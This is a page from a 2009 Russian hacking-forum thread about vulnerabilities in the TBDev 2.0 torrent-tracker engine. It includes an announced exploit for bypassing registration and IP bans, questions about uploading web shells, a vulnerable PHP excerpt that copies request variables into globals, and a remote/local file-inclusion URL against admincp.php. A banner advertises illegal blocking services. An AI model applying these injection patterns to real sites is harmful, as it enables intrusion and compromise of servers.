Трекер-движок TBDev 2.0

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Трекер-движок TBDev 2.0

Страница 15 из 27

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#141

13.07.2009, 04:46

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

С нами: 10018169

Репутация: 1680

Это видимо особый стиль написания движка с новым подходом?
Хоть одну дырку (пусть беспонтовую) осмысленно оставить...

#142

13.07.2009, 13:22

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

Цитата:

просто так его вызвать нельзя...

? в смисле нельзя

#143

13.07.2009, 17:37

peonix

Познающий

Регистрация: 09.11.2008

Сообщений: 34

С нами: 9212732

Репутация: 2

Цитата:

Сообщение от Yuna

? в смисле нельзя

ну доступа к нему нет, ошибка 403, проверял и на локалхосте и во всех сайтах с этим движком

#144

13.07.2009, 19:35

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

Видимо у вас что -то не так, вызвать его напрямую можно...
Только он доступен-то модератором только т.к это против них XSS

#145

02.08.2009, 10:39

Rostov114

Познающий

Регистрация: 05.09.2008

Сообщений: 33

С нами: 9305379

Репутация: 29

Отправить сообщение для Rostov114 с помощью AIM

Отправить сообщение для Rostov114 с помощью Yahoo

Новый сплоит от меня. Базируеться на сплоите от Qwazar.

На данный момент он умеет обходить:

Коды регистрации
Запросы инвайтов
Бан по IP

Совершает атаки через:

./rss.php
./requests.php
./takesignup.php
./check_signup.php
./viewoffers.php
Форум

Также имеет 2 способа работы:

Multi mode - атака по всем файлам, в том числе авторигистрация.
Qwazar exploit mode - работает как вторая версия эксплоита от Qwazar

В связи с тем что форум не захотел отобразить не маленький сплоит. Пришлось его загрузить на отдельный сервер. Взять его можете здесь

Если по каким то причинам данный скрипт у вас не запускается, виноваты вы. Он рабочий, проверялся на оригинальном TBDev 2.0.

Внимание: Данная программа выложена здесь для ознакомления.
Автор не несёт ответственности за негативные последствия, причинённые данной программой в результате правильного или неправильного её использования.
Также автор не несет ответственности за причерченный вред кому либо данной программой.

Последний раз редактировалось Rostov114; 06.08.2009 в 05:10..

#146

05.08.2009, 23:15

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

С нами: 9030566

Репутация: 2017

как еще можно залить шелл??кроме блоков

#147

07.08.2009, 13:00

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

Цитата:

Сообщение от Rostov114

Новый сплоит от меня. Базируеться на сплоите от Qwazar.

Спасибо за сплоит, пару багов закрыл

Цитата:

Сообщение от HAXTA4OK

как еще можно залить шелл??кроме блоков

Если лишних модов не ставились, и баги в rss.php и прочие закрыты - никак.

#148

07.08.2009, 15:02

1ce666

Участник форума

Регистрация: 09.12.2008

Сообщений: 159

С нами: 9168511

Репутация: 214

Делись фиксами

#149

07.08.2009, 18:51

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

С нами: 9030566

Репутация: 2017

Цитата:

Сообщение от Yuna

Спасибо за сплоит, пару багов закрыл

Если лишних модов не ставились, и баги в rss.php и прочие закрыты - никак.

зарегай меня там...а то скока мылов у тебя блочены =) а новые версии интересны =)

#150

07.08.2009, 19:20

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

С нами: 11020706

Репутация: 4693

Цитата:

Сообщение от Yuna

Если лишних модов не ставились, и баги в rss.php и прочие закрыты - никак.

Можно, если есть доступ в админку. По крайней мере в той версии, что сейчас доступна для скачивания и во всех предыдущих. Палю превад (From ROA with love):

RFI/LFI:

В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания:

Код:

$op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];

foreach ($_GET as $key => $value)
	$GLOBALS[$key] = $value;
foreach ($_POST as $key => $value)
	$GLOBALS[$key] = $value;
foreach ($_COOKIE as $key => $value)
	$GLOBALS[$key] = $value;

require_once($rootpath . 'admin/functions.php');

Этот файл инклудится в admin.php . Который в свою очередь инклудится в admincp.php. (Файлы из /admin/ закрыты при помощи .htaccess)

т.е. :

Код:

http://test/tbdev/admincp.php?rootpath=[RFI/LFI]

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 07.08.2009 в 19:24..

Страница 15 из 27

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода	geforse	Мировые новости. Обсуждения.	1	14.07.2008 22:41
Web 2.0 выходит на государственный уровень	vadim399	Мировые новости. Обсуждения.	2	12.01.2008 18:06
Проложение витых пар в городских домах	Рогатый Трупоед	"Железо"	11	20.09.2004 09:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL